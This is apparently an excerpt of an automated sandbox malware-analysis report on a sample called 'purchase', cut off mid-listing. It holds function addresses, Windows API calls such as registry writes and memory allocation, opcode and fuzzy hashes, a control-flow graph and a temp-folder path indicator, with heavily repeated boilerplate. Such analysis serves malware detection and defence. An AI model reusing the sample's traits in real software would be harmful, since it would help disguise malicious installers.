                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                          • String ID: C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Tilsmil
                                          • API String ID: 1892508949-3069811719
                                          • Opcode ID: c6adeddc9a0f3146ad326abe4ad94d0b73c70f6bd455b8f7f02732671ca1c312
                                          • Instruction ID: 707209c2395922376f9f001c82b8f9212c950a3f0646f554414056ec45e3a30b
                                          • Opcode Fuzzy Hash: c6adeddc9a0f3146ad326abe4ad94d0b73c70f6bd455b8f7f02732671ca1c312
                                          • Instruction Fuzzy Hash: DC11B231504514EBDF206FA5CD415AF36B0EF14368B25493FE942B22F1D63E4A81DA9D
                                          Function 00407094 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 790 407094-40709a 791 40709c-40709e 790->791 792 40709f-4070bd 790->792 791->792 793 407390-40739d 792->793 794 4072cb-4072e0 792->794 795 4073c7-4073cb 793->795 796 4072e2-4072f8 794->796 797 4072fa-407310 794->797 798 40742b-40743e 795->798 799 4073cd-4073ee 795->799 800 407313-40731a 796->800 797->800 801 407347-40734d 798->801 802 4073f0-407405 799->802 803 407407-40741a 799->803 804 407341 800->804 805 40731c-407320 800->805 811 406af2 801->811 812 4074fa 801->812 806 40741d-407424 802->806 803->806 804->801 807 407326-40733e 805->807 808 4074cf-4074d9 805->808 813 4073c4 806->813 814 407426 806->814 807->804 810 4074e5-4074f8 808->810 815 4074fd-407501 810->815 816 406af9-406afd 811->816 817 406c39-406c5a 811->817 818 406b9e-406ba2 811->818 819 406c0e-406c12 811->819 812->815 813->795 823 4073a9-4073c1 814->823 824 4074db 814->824 816->810 825 406b03-406b10 816->825 817->794 821 406ba8-406bc1 818->821 822 40744e-407458 818->822 826 406c18-406c2c 819->826 827 40745d-407467 819->827 828 406bc4-406bc8 821->828 822->810 823->813 824->810 825->812 829 406b16-406b5c 825->829 830 406c2f-406c37 826->830 827->810 828->818 831 406bca-406bd0 828->831 832 406b84-406b86 829->832 833 406b5e-406b62 829->833 830->817 830->819 834 406bd2-406bd9 831->834 835 406bfa-406c0c 831->835 838 406b94-406b9c 832->838 839 406b88-406b92 832->839 836 406b64-406b67 GlobalFree 833->836 837 406b6d-406b7b GlobalAlloc 833->837 840 406be4-406bf4 GlobalAlloc 834->840 841 406bdb-406bde GlobalFree 834->841 835->830 836->837 837->812 842 406b81 837->842 838->828 839->838 839->839 840->812 840->835 841->840 842->832
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
                                          • Instruction ID: 57bf2fd90c69a3a2134d3ca1d9604f9a54cf20ddad3feead76618616929b2f58
                                          • Opcode Fuzzy Hash: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
                                          • Instruction Fuzzy Hash: 17A15471E04229CBDF28CFA8C8546ADBBB1FF44305F10846ED816BB281D7786A86DF45
                                          Function 00407295 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
                                          • Instruction ID: 6b1c66eb9f97b1ade68f1d395623a9ed29f1776dbc94043a645b3c6b65beda35
                                          • Opcode Fuzzy Hash: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
                                          • Instruction Fuzzy Hash: C5912270E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB281D778A986DF45
                                          Function 00406FAB Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
                                          • Instruction ID: ce41943af36f178b06a8ef9aeec7331a28cc36c4f565c07526a7a1ecbc0683f6
                                          • Opcode Fuzzy Hash: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
                                          • Instruction Fuzzy Hash: 8C813571E04228CFDF24CFA8C844BADBBB1FB45305F24816AD456BB281D778A986DF45
                                          Function 00406AB0 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
                                          • Instruction ID: 8f4657df29e0a6c4f41eae1c6e560b42ebe12933d6c33c39fa024371cffe791d
                                          • Opcode Fuzzy Hash: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
                                          • Instruction Fuzzy Hash: F4815771E04228DBDF24CFA8C8447ADBBB1FF44315F10816AD856BB281D7786986DF45
                                          Function 00406EFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
                                          • Instruction ID: 467485e0bb60f7ca81b57cb4e762169b1f98b62e9d0b722d18e83a7fcf81438f
                                          • Opcode Fuzzy Hash: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
                                          • Instruction Fuzzy Hash: 04711375E04228CBDF24CFA8C844BADBBF1FB48305F15806AD856B7281D778A986DF45
                                          Function 0040701C Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
                                          • Instruction ID: 8594309fab6a939f8579025671b20e25c27ad2f20b93bd04310bc8f9388019e2
                                          • Opcode Fuzzy Hash: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
                                          • Instruction Fuzzy Hash: A6713471E04228CBDF28CF98C844BADBBB1FF45305F14806AD816BB281D778A986DF45
                                          Function 00406F68 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
                                          • Instruction ID: 804367245b599a5d262e6525417658d62bb0317a144133a249ff79fbb491f744
                                          • Opcode Fuzzy Hash: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
                                          • Instruction Fuzzy Hash: 04712571E04228CBDF28CF98C854BADBBB1FF44305F15806AD856B7281C778A986DF45
                                          Function 00401BC0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalFree.KERNEL32(00000000), ref: 00401C30
                                          • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C42
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: Global$AllocFree
                                          • String ID: 32079
                                          • API String ID: 3394109436-2447952077
                                          • Opcode ID: 447f2160a9f8a762491bb83b7e5e8947865ce659ff46afcc73d93e079212092c
                                          • Instruction ID: b885d26f68b874ad9ff9a305e80acb85bda866dca5011e4f065ba1a91b1516cf
                                          • Opcode Fuzzy Hash: 447f2160a9f8a762491bb83b7e5e8947865ce659ff46afcc73d93e079212092c
                                          • Instruction Fuzzy Hash: 09218473904610ABD730ABA4DE85A6E72A4AB04328715053FF952B32D4C6BCE8919B5D
                                          Function 004024AF Relevance: 4.6, APIs: 3, Instructions: 64registrystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(0040B5C8,00000023,00000011,00000002), ref: 004024FA
                                          • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5C8,00000000,00000011,00000002), ref: 0040253A
                                          • RegCloseKey.ADVAPI32(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 00402622
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CloseValuelstrlen
                                          • String ID:
                                          • API String ID: 2655323295-0
                                          • Opcode ID: 833edd450bf946c24d3a3f94cfbbaf1e2376c793e7492529022bf014ff981997
                                          • Instruction ID: 8b3a83999d63c16b18a9973427bcf430ab7992b94c8fe07ed2dd95b358db5eaa
                                          • Opcode Fuzzy Hash: 833edd450bf946c24d3a3f94cfbbaf1e2376c793e7492529022bf014ff981997
                                          • Instruction Fuzzy Hash: 1611B431D00114BEDB00AFA5DE59AAEB6B4EF44318F20443FF400B61D1C7B88E409668
                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                          • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                          • Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
                                          • Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                          • Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C
                                          Function 00405699 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OleInitialize.OLE32(00000000), ref: 004056A9
                                            • Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                          • CoUninitialize.COMBASE(00000404,00000000), ref: 004056F5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: InitializeMessageSendUninitialize
                                          • String ID:
                                          • API String ID: 2896919175-0
                                          • Opcode ID: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
                                          • Instruction ID: b888f1dcde8397bdf9a4ac710541df7d57aeeece4d3a8f29a6716c55d94af5f1
                                          • Opcode Fuzzy Hash: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
                                          • Instruction Fuzzy Hash: 0AF0B4776007409BE7115B54AE05B5B77B0EB90354F85483AEF8D726F1C7764C028B5D
                                          Function 00401F03 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                          Download Yara Rule
                                          APIs
                                          • ShowWindow.USER32(00000000,00000000), ref: 00401F21
                                          • EnableWindow.USER32(00000000,00000000), ref: 00401F2C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
